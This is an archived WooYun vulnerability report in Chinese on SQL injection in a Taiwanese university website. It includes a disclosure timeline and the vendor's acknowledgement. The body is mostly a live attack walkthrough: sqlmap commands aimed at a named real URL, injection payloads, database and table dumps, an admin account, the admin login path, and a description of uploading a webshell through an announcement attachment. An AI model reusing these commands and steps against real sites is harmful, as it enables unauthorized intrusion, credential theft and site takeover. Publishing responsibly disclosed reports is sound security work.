乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-21: 细节已通知厂商并且等待厂商处理中 2015-07-21: 厂商已经确认,细节仅向厂商公开 2015-07-31: 细节向核心白帽子及相关领域专家公开 2015-08-10: 细节向普通白帽子公开 2015-08-20: 细节向实习白帽子公开 2015-09-04: 细节向公众公开
台湾朝阳科技大学是私立工科大学本来是学习google hacking的.然后发现了这个网站,觉得有问题就看了一下很好奇wooyun怎么通知.
存在注入,只是get webshell
sqlmap.py -u "http://ctl.cyut.edu.tw/ctlnew/news/new_detail.php?no=936&no2=1" --random-agent --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: no (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: no=936 AND 6560=6560&no2=1 Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: no=936 UNION ALL SELECT CONCAT(0x7162716b71,0x69744949634270505145,0x717a6b7871),NULL,NULL,NULL,NULL#&no2=1 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: no=936 AND (SELECT * FROM (SELECT(SLEEP(5)))ZuUm)&no2=1---[01:32:40] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.10back-end DBMS: MySQL 5.0.11[01:32:40] [INFO] fetching database names[01:32:40] [INFO] the SQL query used returns 2 entries[01:32:40] [INFO] resumed: information_schema[01:32:40] [INFO] resumed: ctlnewavailable databases [2]: [*] ctlnew[*] information_schema然后找用户密码sqlmap.py -u "http://ctl.cyut.edu.tw/ctlnew/news/new_detail.php?no=936&no2=1" --random-agent -D ctlnew --tables[31 tables]+----------------------+| #mysql50#equipment-c || #mysql50#newsdata-c || level || user || active || activedata || association || associationtype || download || downloadtype || equipment || handbook || handbooktype || job || jobdata || jobtype || law || link || manual || member || news || newsdata || plan || plandata || plangroup || planperson || profess || question || questiontype || result || resultdata |+----------------------+在user table里面有adminacad找后台在http://ctl.cyut.edu.tw/robots.txtWe can login at http://ctl.cyut.edu.tw/ctlback/login.phpbtw,the phpmyadmin has a good alias啊,又可以输入中文了.好开心输入之前的用户名和密码登录之后再去http://ctl.cyut.edu.tw/accback/修改旧的公告上传webshell在最底下的98學年度第一學期進修部就學貸款溢貸金額於12/10(星期四)退費 可以看到附件.点击可直接进去
过滤吧
危害等级:高
漏洞Rank:20
确认时间:2015-07-21 17:17
感謝通報!
暂无